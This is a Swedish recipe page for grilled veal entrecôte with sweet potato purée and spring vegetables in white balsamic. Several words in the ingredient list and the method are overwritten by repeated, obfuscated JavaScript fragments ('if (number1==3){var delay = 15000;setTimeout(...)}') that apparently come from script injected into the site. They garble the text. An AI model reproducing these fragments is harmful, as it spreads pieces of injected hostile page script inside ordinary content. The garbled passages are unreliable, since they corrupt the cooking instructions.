Kalventrecote grillad, sötpotatispure med rostadvitlök i sommarprimörer med vitbalsamic.
2013-06-14- Course: Huvudrätter
- Skill Level: Medel
- Yield : 1
- Servings : 1
- Prep Time : 5m
- Cook Time : 10m
- Ready In : 25m
Ingredienser
- 170g kalventrecote
- 120g tärnad sötpotatis
- 50g 3st sparris
- 30g 4st baby morötter eller vanlig skivad morot
- 30g st kvartade rädisor
- 30g skivad challotenlök
- Handom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}full gräslök
- 1 vitök, halva skivad tunt andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ra halvan hackad.
- 30g kesella
- 5g laktosfri smör
- 1 matsked vitbalsamic vinäger
- 1/3 tesked stevia
- Svartpeppar
- Örtsalt
- Citron
- 3dl vatten
Gör så här:
Sätt igång ugnen på 150C.
Värm en grillpanna. Låt köttbiten ligga ute i rumstemperatur.
Lägg sötpotatis och hackad vitlök i en gryta med 2,5dl vatten. Koka på medelvärme till nästan allt vatten har kokat bort. Ca 10 minuter.
Använd en handom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}visp till att vispa till potatisen till en jämn pure, blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a i kesella, 1/2 vatten, krydda med stevia, svartpeppar och örtsalt. Låt stå på eftervärmen.
Grilla köttbiten i ca 8 minuter, avsluta med att klämma citronsaft och krydda med örtsalt. Låt vila i 1-2 minuter
När köttbiten är på, värm en stekpanna med smör, stek den skivade vitlöken och sparrisen i ca 2 minuter, lägg i resten av primörerna, häll på vitbalsamic vinäger, placera i ugnen i 4 minuter. Avsluta med örtsalt och gräslök.
Servera med sötpotatis, kalv och primörer.
Medlemsbetyg
(5 / 5)
1 people rated this recipe
Related Recipes:
Näringssinnehåll
Informationen gäller per portion
-
kCal
444,2 -
Protein
43,4 g -
Kolhydrater
39,4 g -
Fett
12,2 g